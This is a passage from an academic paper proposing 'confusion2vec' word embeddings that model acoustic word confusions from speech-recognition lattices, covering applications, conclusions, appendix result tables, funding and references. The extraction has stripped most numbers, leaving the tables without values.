alternatives (see table ; example . , . ). all the above observations are supportive of the proposed confusion vec word representation and is in line with the expectations for the task of asr error correction. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ potential applications in addition to the above discussed asr error correction task, other potential applications include: machine translation: in machine translation, word lattices are used to provide multiple sources for generating a single translation (schroeder, cohn & koehn, ; dyer, ). word lattices derived from reordered hypotheses yes:yes/ write:write/ . right:right/ . answer:answer/ (a) example she:she/ . shea:shea/ . likes:likes/ sea:sea/ . see:see/ . (b) example figure confusion network examples. full-size doi: . /peerj-cs. /fig- w t, w t, w t, c(t) p(w t, ))) p(w t, ) p(w t, ) w t- , w t- , w t- , c(t- ) p(w t- , ) p(w t- , ) p))p(w t- , ) w t+ , w t+ , w t+ , c(t+ ) p(w t+ , )))p(w t+ , )) p(w t+ , ) sum feature vector figure computation of lattice feature vector. full-size doi: . /peerj-cs. /fig- table cosine similarity between the asr ground-truth and asr output in application to asr error correction for baseline pre-trained word vec and the proposed confusion vec: jointly optimized intra-confusion + top-confusion models. example ground-truth asr output w v similarity c v similarity . “yes right answer” “yes (right/write) answer” . . . “yes right answer” “yes write answer” . . . “yes write answer” “yes (right/write) answer” . . . “yes rite answer” “yes (right/write) answer” . . . “yes rite answer” “yes right answer” . . . “yes rite answer” “yes write answer” . . . “she likes sea” “(she/shea) likes (see/sea)” . . . “she likes sea” “shea likes see” . . . “shea likes see” “(she/shea) likes (see/sea)” . . . “shea likes see” “(she/shea) likes (see/rocket)” . . . “she likes sea” “(she/shea) likes (see/rocket)” . . note: examples . – . inherits structure as in fig. a, that is, “yes (right/write) answer” assigns weight of . to yes and answer, . to right, . to write. similarly examples . – . inherits structure as in fig. b. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (costa-jussà & fonollosa, ; niehues & kolss, ; hardmeier, bisazza & federico, ), morphological transformations (dyer, ; hardmeier, bisazza & federico, ), word segmentations (dyer, ), paraphrases (onishi, utiyama & sumita, ) are used to introduce ambiguity and alternatives for training machine translation systems (wuebker & ney, ; dyer, muresan & resnik, ; dyer, ). source language alternatives can also be exploited by introducing ambiguity derived from the combination of multiple machine translation systems (matusov, ueffing & ney, ; rosti et al., a; rosti, matsoukas & schwartz, b). in the case of machine translation, the word-confusion subspace is associated with morphological transformations, word segmentations, paraphrases, part-of-speech information, etc., or a combination of them. although the word-confusion subspace is not orthogonal, the explicit modeling of such ambiguity relationships is beneficial. nlp: other nlp based applications like paraphrase generation (quirk, brockett & dolan, ), word segmentation (kruengkrai et al., ), part-of-speech tagging (kruengkrai et al., ) also operate on lattices. as discussed in the section “machine learning algorithms,” confusion vec can exploit the ambiguity present in the lattices for the betterment of the tasks. asr: in asr systems, word lattices and confusion networks are often re-scored using various algorithms to improve their performances by exploiting ambiguity (sundermeyer et al., ; mangu, brill & stolcke, ; xiong et al., ; liu et al., ). in the case of asr, the word-confusion subspace is associated with the acoustic similarity of words which is often orthogonal to the semantic-syntactic subspace as discussed in the section “human speech production, perception and hearing.” examples – are prime cases supporting the need for jointly modeling acoustic word confusions and semantic-syntactic subspace. spoken language understanding: similarly, as in the case of asr, confusion vec could exploit the inherent acoustic word-confusion information for keyword spotting (mangu, brill & stolcke, ), confidence score estimation (mangu, brill & stolcke, ; seigel & woodland, ; kemp & schaaf, ; jiang, ), domain adaptation (shivakumar et al., ), lattice compression (mangu, brill & stolcke, ), spoken content retrieval (chelba, hazen & saraclar, ; hori et al., ), system combinations (mangu, brill & stolcke, ; hoffmeister et al., ), and other spoken language understanding tasks (hakkani-tür et al., ; tur et al., ; marin et al., ) which operate on lattices. speech translation: in speech translation systems, incorporating the word lattices and confusion networks (instead of the single top hypothesis) is beneficial in better integrating speech recognition system to the machine translation systems (bertoldi, zens & federico, ; mathias & byrne, ; matusov, kanthak & ney, ; schultz et al., ). similarly, exploiting uncertainty information between the “asr —machine translation—speech synthesis” systems for speech-to-speech translation is useful (lavie et al., ; wahlster, ). since speech translation involves combination of asr and the machine translation systems, the word-confusion gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ subspace is associated with a combination of acoustic word-similarity (for asr) and morphological-segmentation-paraphrases ambiguities (for machine translation). “see son winter is here” / “voir fils hiver est ici” (example ) “season winter is here” / “saison hiver est ici” (example ) examples and demonstrate a case of speech translation of identically sounding english phrases to french. words “see son” and “season” demonstrate ambiguity in terms of word segmentation. whereas, the phrases “see son” and “season” also exhibit ambiguity in terms of acoustic similarity. by modeling both word-segmentation and acoustic-confusion through word vector representations, the confusion vec can provide crucial information that the french words “voir” and “saison” are confusable under speech translation framework. optical character recognition: in optical character recognition (ocr) systems, the confusion axis is related to pictorial structures of the characters/words. for example, say the characters “a” and “o” are easily confusable thus leading to similar character vectors in the embedding space. in the case of word level confusions leading to words “ward” and “word” being similar with confusion vec (word vec would have the words “word” and “ward” fairly dissimilar). having this crucial optical confusion information is useful during ocr decoding on sequence of words when used in conjunction with the linguistic contextual information. image/video scene summarization: the task of scene summarization involves generating descriptive text summarizing the content in one or more images. intuitively, the task would benefit from linguistic contextual knowledge during the text generation. however, with the confusion vec, one can model and expect to capture two additional information streams (i) pictorial confusion of image/object recognizer, and (ii) pictorial context, that is, modeling objects occurring together (e.g., we can expect oven to often appear nearby a stove or other kitchen appliances). the additional streams of valuable information embedded in the lattices can contribute for better decoding. in other words, for example, word vec can exhibit high dissimilarity between the words “lifebuoy” and “donuts”, however, the confusion vec can capture their pictorial similarity in a better word space representation and thus aiding in their end application of scene summarization. conclusion in this work, we proposed a new word vector representation motivated from human speech and perception and aspects of machine learning for incorporating word confusions from lattice like structures. the proposed confusion vec model is meant to capture additional word-confusion information and improve upon the popular word vec models without compromising the inherent information captured by the word vec models. although the word confusions could be domain/task specific, we present a case study on asr lattices where the confusions are based on acoustic similarity of words. specifically, with respect to asr related applications, the aim is to capture the contextual statistics, as with word vec, and additionally also capture the acoustic word gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ confusion statistics. several training configurations are proposed for confusion vec model, each utilizing different degrees of acoustic confusability vs. contextual information, present in the noisy (confusion network) asr output, for modeling the word vector space. further, techniques like pre-training/initializations, model concatenation and joint optimization are proposed and evaluated for the confusion vec models. appropriate evaluation schemes are formulated for the domain specific application. the evaluation schemes are inspired from the popular analogy based question test set and word similarity tasks. a new analogy task and word similarity tasks are designed for the acoustic confusion/similarity scenario. a detailed tabulation of results are presented for the confusion vec model and compared to the baseline word vec models. the results show that the confusion vec can augment additional task-specific word confusion information without compromising on the semantic and syntactic relationships captured by the word vec models. next, detailed analysis is conducted on the confusion vec vector space through pca reduced two-dimensional plots for three independent word relations: (i) semantic relations, (ii) syntactic relations, and (iii) acoustic relations. the analysis further supports our aforementioned experimental inferences. few toy examples are presented toward the task of asr error correction to support the adequacy of the confusion vec over the word vec word representations. the study validates through various hypotheses and test results, the potential benefits of the confusion vec model. future work in the future, we plan to work on improving the confusion vec model by incorporating the sub-word and phonemic transcription of words during training. sub-words and character transcription information is shown to improve the word vector representation (bojanowski et al., ; chen et al., ). we believe the sub-words and phoneme transcriptions of words are even more relevant to confusion vec. in addition to the improvements expected toward the semantic and syntactic representations (word vec), since the sub-words and phoneme transcriptions of acoustically similar words are similar, it should help in modeling the confusion vec to a much greater extent. apart from concentrating on improving the confusion vec model, this work opens new possible opportunities in incorporating the confusion vec embeddings to a whole range of full-fledged applications such as asr error correction, speech translation tasks, machine translation, discriminative language models, optical character recognition, image/video scene summarization, etc. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ appendix table a analogy task results with semantic&syntactic splits: different proposed models. model analogy tasks semantic&syntactic analogy acoustic analogy semantic&syntactic–acoustic analogy average accuracy semantic syntactic semantic& syntactic semantic– acoustic syntactic– acoustic semantic& syntactic– acoustic google w v . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) in-domain w v . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v- . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v-a . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v-c . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v-* . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*: hybrid intra-inter. all the models are of dimensions except google w v ( dimensions). numbers inside parenthesis indicate top- evaluation accuracy; numbers outside parenthesis represent top- evaluation accuracy. google word vec, word vec groundtruth (trained on in-domain) and baseline word vec (trained on asr transcriptions) perform better with the semantic&syntactic tasks, but fares poorly with acoustic analogy task. intra-confusion performs well on acoustic analogy task while compromising on semantic&syntactic task. inter-confusion performs well on both the acoustic analogy and semantic&syntactic tasks. hybrid intra-inter training performs fairly well on all the three analogy tasks (acoustic, semantic&syntactic and semantic&syntactic–acoustic). table a similarity task results: different proposed models. model similarity tasks word similarity acoustic similarity google w v . ( . e- ) - . ( . e- ) in-domain w v . ( . e- ) - . ( e- ) c v- . ( . e- ) . ( . e- ) c v-a . ( . ) . ( . e- ) c v-c . ( . e- ) . ( . e- ) c v-* . ( . ) . ( . e- ) notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter. similarity in terms of spearman’s correlation. all the models are of dimensions except google w v ( dimensions). numbers inside parenthesis indicate correlation p-value for similarity tasks google word vec, baseline word vec, and word vec groundtruth, all show high correlations with word similarity, while showing poor correlations on acoustic similarity. google word vec and word vec groundtruth models trained on clean data exhibit negative acoustic similarity correlation. baseline word vec trained on noisy asr shows a small positive acoustic similarity correlation. intra-confusion, inter-confusion, and hybrid intra-inter training show higher correlations on acoustic similarity. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table a analogy task results with semantic&syntactic splits: model pre-training/initialization. model analogy tasks semantic&syntactic analogy acoustic analogy semantic&syntactic–acoustic analogy average accuracy semantic syntactic semantic& syntactic semantic– acoustic syntactic– acoustic semantic& syntactic– acoustic google w v . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) in-domain w v . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v- . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v-a . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v-c . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) c v-* . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) . % ( . %) notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter. all the models are of dimensions. numbers inside parenthesis indicate top- evaluation accuracy; numbers outside parenthesis represent top- evaluation accuracy. pre-training is helpful in all the cases. pre-training boosts the semantic&syntactic analogy accuracy for all. for intra-confusion, inter-confusion and hybrid intra-inter models, pre-training boosts the semantic&syntactic–acoustic analogy accuracies. a small dip in acoustic analogy accuracies is observed. however, overall average accuracy is improved. table a similarity task results: model pre-training/initialization. model similarity tasks word similarity acoustic similarity google w v . ( . e- ) - . ( . e- ) in-domain w v . ( . e- ) - . ( . e- ) c v- . ( . e- ) - . ( . e- ) c v-a . ( . e- ) . ( . e- ) c v-c . ( . e- ) . ( . e- ) c v-* . ( . e- ) . ( . e- ) notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter. similarity in terms of spearman’s correlation. all the models are of dimensions. numbers inside parenthesis indicate correlation p-value for similarity tasks. pre-training boosts the word similarity correlation for all the models. the correlation is improved considerably in the case of intra-confusion, inter-confusion, and hybrid intra-inter models while maintaining good correlation on acoustic similarity. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t ab le a a n al o gy ta sk re su lt s: m o d el co n ca te n at io n an d jo in t o p ti m iz at io n . m o d el f in e- tu n in g a n al o gy ta sk s s em an ti c& s yn ta ct ic an al o gy a co u st ic an al o gy s em an ti c& s yn ta ct ic – ac o u st ic an al o gy a ve ra ge ac cu ra cy s ch em e s em an ti c s yn ta ct ic s em an ti c& s yn ta ct ic s em an ti c– ac o u st ic s yn ta ct ic – ac o u st ic s em an ti c& s yn ta ct ic – ac o u st ic g o o gl e w v – . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) in -d o m ai n w v ( d im .) – . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) m o d el co n ca te n at io n c v - (f ) + c v -a (f ) – . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -c (f ) – . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -* (f ) – . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) f ix ed co n te xt u al su b sp ac e jo in t o p ti m iz at io n c v - (f ) + c v -a (l ) in te r . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -a (l ) in tr a . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -a (l ) h yb ri d . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -c (l ) in te r . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -c (l ) in tr a . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -c (l ) h yb ri d . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -* (l ) in te r . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (f ) + c v -* (l ) in tr a . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . ) c v - (f ) + c v -* (l ) h yb ri d . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) u n re st ri ct ed jo in t o p ti m iz at io n c v - (l ) + c v -a (l ) in te r . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t ab le a (c o n ti n u ed ). m o d el f in e- tu n in g a n al o gy ta sk s s em an ti c& s yn ta ct ic an al o gy a co u st ic an al o gy s em an ti c& s yn ta ct ic – ac o u st ic an al o gy a ve ra ge ac cu ra cy s ch em e s em an ti c s yn ta ct ic s em an ti c& s yn ta ct ic s em an ti c– ac o u st ic s yn ta ct ic – ac o u st ic s em an ti c& s yn ta ct ic – ac o u st ic c v - (l ) + c v -a (l ) in tr a . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (l ) + c v -a (l ) h yb ri d . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (l ) + c v -c (l ) in te r . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (l ) + c v -c (l ) in tr a . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (l ) + c v -c (l ) h yb ri d . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (l ) + c v -* (l ) in te r . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (l ) + c v -* (l ) in tr a . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) c v - (l ) + c v -* (l ) h yb ri d . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) . % ( . % ) n o te s: c v - , to p -c o n fu si o n ; c v -a , in tr a- co n fu si o n ; c v -c , in te r- co n fu si o n ; c v -* , h yb ri d in tr a- in te r. n u m b er s in si d e p ar en th es is in d ic at e to p - ev al u at io n ac cu ra cy ; a ll th e m o d el s ar e o f d im en si o n s. n u m b er s o u ts id e p ar en th es is re p re se n t to p - ev al u at io n ac cu ra cy . a cr o n ym s: (f ): f ix ed em b ed d in g, (l ): l ea rn em be d d in g d u ri n g jo in t tr ai n in g. m o d el co n ca te n at io n p ro vi d es ga in s in ac o u st ic -a n al o gy ta sk an d th er eb y re su lt in g in ga in s in av er ag e ac cu ra cy co m p ar ed to re su lt s in t ab le a fo r in tr a- co n fu si on an d in te r- co n fu si o n m o d el s. f ix ed co n te xt u al su b sp ac e an d u n re st ri ct ed jo in t o p ti m iz at io n s fu rt h er im p ro ve s re su lt s o ve r m od el co n ca te n at io n . b es t re su lt s in te rm s o f av er ag e ac cu ra cy is o b ta in ed w it h u n re st ri ct ed jo in t o p ti m iz at io n s, an ab so lu te im p ro ve m en t o f % .c o n fu si o n v ec m o d el s su rp as s w o rd v ec ev en fo r se m an ti c& sy n ta ct ic an al o gy ta sk (t o p - ev al u at io n ac cu ra cy ). gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acknowledgements opinions, interpretations, conclusions and recommendations are those of the author and are not necessarily endorsed by the department of defense. additional information and declarations funding the u.s. army medical research acquisition activity is the awarding and administering acquisition office. this work was supported by the office of the assistant secretary of table a similarity task results: model concatenation and joint optimization. model fine-tuning scheme similarity tasks word similarity acoustic similarity google w v – . ( . e- ) - . ( . e- ) in-domain w v ( dim.) – . ( . e- ) - . ( . e- ) model concatenation c v- (f) + c v-a (f) – . ( . e- ) . ( . e- ) c v- (f) + c v-c (f) – . ( . e- ) . ( . e- ) c v- (f) + c v-* (f) – . ( . e- ) . ( . e- ) fixed contextual subspace joint optimization c v- (f) + c v-a (l) inter . ( . e- ) . ( . e- ) c v- (f) + c v-a (l) intra . ( . e- ) . ( . e- ) c v- (f) + c v-a (l) hybrid . ( . e- ) . ( . e- ) c v- (f) + c v-c (l) inter . ( . e- ) . ( . e- ) c v- (f) + c v-c (l) intra . ( . e- ) . ( . e- ) c v- (f) + c v-c (l) hybrid . ( . e- ) . ( . e- ) c v- (f) + c v-* (l) inter . ( . e- ) . ( . e- ) c v- (f) + c v-* (l) intra . ( . e- ) . ( . e- ) c v- (f) + c v-* (l) hybrid . ( . e- ) . ( . e- ) unrestricted joint optimization c v- (l) + c v-a (l) inter . ( . e- ) . ( . e- ) c v- (l) + c v-a (l) intra . ( . e- ) . ( e- ) c v- (l) + c v-a (l) hybrid . ( . ) . ( . e- ) c v- (l) + c v-c (l) inter . ( . e- ) . ( . e- ) c v- (l) + c v-c (l) intra . ( . e- ) . ( . e- ) c v- (l) + c v-c (l) hybrid . ( . e- ) . ( . e- ) c v- (l) + c v-* (l) inter . ( e- ) . ( . e- ) c v- (l) + c v-* (l) intra . ( . e- ) . ( . e- ) c v- (l) + c v-* (l) hybrid . ( . e- ) . ( . e- ) notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter. similarity in terms of spearman’s correlation. all the models are of dimensions. numbers inside parenthesis indicate correlation p-value for similarity tasks. good correlations are observed for both the word similarity and acoustic similarity with model concatenation with and without joint optimization. all the correlations are found to be statistically significant. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ defense for health affairs through the psychological health and traumatic brain injury research program under award no. w xwh- - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: the u.s. army medical research acquisition activity is the awarding and administering acquisition office. office of the assistant secretary of defense for health affairs through the psychological health and traumatic brain injury research program under award: w xwh- - - . competing interests the authors declare that they have no competing interests. author contributions � prashanth gurunath shivakumar performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � panayiotis georgiou conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data are derivatives of ldc datasets: https://www.ldc.upenn.edu and derived using standard kaldi recipes as described in the article: http://kaldi-asr.org. our training and validation code is at: https://bitbucket.org/georgiou/confusion vec. references abadi m, barham p, chen j, chen z, davis a, dean j, devin m, ghemawat s, irving g, isard m, kudlur m, levenberg j, monga r, moore s, murray dg, steiner b, tucker p, vasudevan v, warden p, wicke m, yu y, zheng x. . tensorflow: a system for large-scale machine learning. in: th usenix symposium on operating systems design and implementation (osdi ). savannah: usenix association, – . allauzen a. . error detection in confusion network. in: interspeech , eighth annual conference of the international speech communication association. august – , , antwerp, – . bengio y, ducharme r, vincent p, jauvin c. . a neural probabilistic language model. journal of machine learning research : – . bengio s, heigold g. . word embeddings for speech recognition. in: interspeech , th annual conference of the international speech communication association. september – , , singapore, – . bertoldi n, zens r, federico m. . speech translation by confusion network decoding. in: ieee international conference on acoustics, speech and signal processing. vol. . piscataway: ieee, iv– . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / https://www.ldc.upenn.edu http://kaldi-asr.org https://bitbucket.org/georgiou/confusion vec http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blei dm, ng ay, jordan mi. . latent dirichlet allocation. journal of machine learning research : – . bojanowski p, grave e, joulin a, mikolov t. . enriching word vectors with subword information. transactions of the association for computational linguistics : – doi . /tacl_a_ . botha ja, blunsom p. . compositional morphology for word representations and language modelling. in: proceedings of the th international conference on machine learning, icml . – june , beijing, – . buckman j, neubig g. . neural lattice language models. transactions of the association for computational linguistics : – doi . /tacl_a_ . celebi a, sak h, dikici e, saraçlar m, lehr m, prud’hommeaux e, xu p, glenn n, karakos d, khudanpur s, roark b, sagae k, shafran i, bikel d, callison-burch c, cao y, hall k, hasler e, koehn p, lopez a, post m, riley d. . semi-supervised discriminative language modeling for turkish asr. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . chelba c, hazen tj, saraclar m. . retrieval and browsing of spoken content. ieee signal processing magazine ( ): – doi . /msp. . . chen x, xu l, liu z, sun m, luan h. . joint learning of character and word embeddings. in: ijcai’ proceedings of the th international conference on artificial intelligence. palo alto: aaai press, – . chung y-a, wu c-c, shen c-h, lee h-y, lee l-s. . audio word vec: unsupervised learning of audio segment representations using sequence-to-sequence autoencoder. in: interspeech , th annual conference of the international speech communication association. september – , , san francisco, – . cieri c, miller d, walker k. . the fisher corpus: a resource for the next generations of speech-to-text. in: proceedings of the fourth international conference on language resources and evaluation (lrec). vol. . paris: elra, – . costa-jussà mr, fonollosa jar. . analysis of statistical and morphological classes to generate weighted reordering hypotheses on a statistical machine translation system. in: proceedings of the second workshop on statistical machine translation, wmt@acl . june , , prague, – . cotterell r, schütze h. . morphological word-embeddings. in: naacl hlt , the conference of the north american chapter of the association for computational linguistics. may –june , , denver: human language technologies, – . deerwester s, dumais st, furnas gw, landauer tk, harshman r. . indexing by latent semantic analysis. journal of the american society for information science ( ): – . dikici e, celebi a, saraçlar m. . performance comparison of training algorithms for semi- supervised discriminative language modeling. in: interspeech , th annual conference of the international speech communication association. september – , , portland, – . dyer cj. . the “noisier channel”: translation from morphologically complex languages. in: proceedings of the second workshop on statistical machine translation, wmt@acl . june , , prague, – . dyer c. . using a maximum entropy model to build segmentation lattices for mt. in: human language technologies: conference of the north american chapter of the association of computational linguistics, proceedings. may –june , boulder, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tacl_a_ http://dx.doi.org/ . /tacl_a_ http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dyer cj. . a formal model of ambiguity and its applications in machine translation. college park: university of maryland. dyer c, muresan s, resnik p. . generalizing word lattice translation. in: acl , proceedings of the th annual meeting of the association for computational linguistics. june – , , columbus, – . erhan d, bengio y, courville a, manzagol p-a, vincent p, bengio s. . why does unsupervised pre-training help deep learning? journal of machine learning research : – . faruqui m, dyer c. . improving vector space word representations using multilingual correlation. in: proceedings of the th conference of the european chapter of the association for computational linguistics, eacl . april – , , gothenburg, – . finkelstein l, gabrilovich e, matias y, rivlin e, solan z, wolfman g, ruppin e. . placing search in context: the concept revisited. in: proceedings of the th international conference on world wide web. new york: acm, – . ghannay s, estève y, camelin n. a. word embeddings combination and neural networks for robustness in asr error detection. in: rd european signal processing conference, eusipco . august –september , , nice, – . ghannay s, estève y, camelin n, deléglise p. . acoustic word embeddings for asr error detection. in: interspeech , th annual conference of the international speech communication association. september – , , san francisco, – . ghannay s, estève y, camelin n, dutrey c, santiago f, adda-decker m. b. combining continuous word representation and prosodic features for asr error prediction. in: proceedings of the third international conference on statistical language and speech processing. vol. , slsp , new york: springer-verlag, – . hakkani-tür d, béchet f, riccardi g, tur g. . beyond asr -best: using word confusion networks in spoken language understanding. computer speech & language ( ): – doi . /j.csl. . . . hardmeier c, bisazza a, federico m. . fbk at wmt : word lattices for morphological reduction and chunk-based reordering. in: proceedings of the joint fifth workshop on statistical machine translation and metrics matr, wmt@acl . july – , , uppsala, – . he w, wang w, livescu k. . multi-view recurrent neural acoustic word embeddings. in: th international conference on learning representations, iclr . april – , , toulon: conference track proceedings. hofmann t. . probabilistic latent semantic analysis. in: uai ‘ : proceedings of the fifteenth conference on uncertainty in artificial intelligence. july –august , , stockholm, – . hoffmeister b, hillard d, hahn s, schluter r, ostendor m, ney h. . cross-site and intra- site asr system combination: comparisons on lattice and -best methods. in: proceedings of the ieee international conference on acoustics, speech, and signal processing, icassp . april – , , honolulu, – . hori t, hetherington il, hazen tj, glass jr. . open-vocabulary spoken utterance retrieval using confusion networks. in: proceedings of the ieee international conference on acoustics, speech, and signal processing, icassp . april – , , honolulu, – . huang eh, socher r, manning cd, ng ay. . improving word representations via global context and multiple word prototypes. in: the th annual meeting of the association for computational linguistics, proceedings of the conference. july – , . vol. . jeju island: long papers, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.csl. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jiang h. . confidence measures for speech recognition: a survey. speech communication ( ): – doi . /j.specom. . . . joulin a, grave e, bojanowski p, mikolov t. . bag of tricks for efficient text classification. in: proceedings of the th conference of the european chapter of the association for computational linguistics. vol. . valencia: short papers, – . kamper h, wang w, livescu k. . deep convolutional acoustic word embeddings using word-pair side information. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . kemp t, schaaf t. . estimating confidence using word lattices. in: fifth european conference on speech communication and technology, eurospeech , september – , , rhodes. kim y. . convolutional neural networks for sentence classification. arxiv preprint available at http://arxiv.org/abs/ . . kruengkrai c, uchimoto k, kazama j, wang y, torisawa k, isahara h. . an error-driven word-character hybrid model for joint chinese word segmentation and pos tagging. in: acl , proceedings of the th annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the afnlp. – august , singapore, – . kurata g, itoh n, nishimura m. . training of error-corrective model for asr without using audio data. in: acoustics, speech and signal processing (icassp), ieee international conference. piscataway: ieee, – . ladhak f, gandhe a, dreyer m, mathias l, rastrow a, hoffmeister b. . latticernn: recurrent neural networks over lattices. in: interspeech , th annual conference of the international speech communication association. september – , , san francisco, – . lavie a, waibel a, levin l, finke m, gates d, gavalda m, zeppenfeld t, zhan p. . janus-iii: speech-to-speech translation in multiple languages. in: ieee international conference on acoustics, speech, and signal processing. vol. . piscataway: ieee, – . le q, mikolov t. . distributed representations of sentences and documents. in: proceedings of the th international conference on machine learning, icml . – june , beijing, – . levin k, henry k, jansen a, livescu k. . fixed-dimensional acoustic embeddings of variable-length segments in low-resource settings. in: ieee workshop on automatic speech recognition and understanding (asru). piscataway: ieee, – . levy 